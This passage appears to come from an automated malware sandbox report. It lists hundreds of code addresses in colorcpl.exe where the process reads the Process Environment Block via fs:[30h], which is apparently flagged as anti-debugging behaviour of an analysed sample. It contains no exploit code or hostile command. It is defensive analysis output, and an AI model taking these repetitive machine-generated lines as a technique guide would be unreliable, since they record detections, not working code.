          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
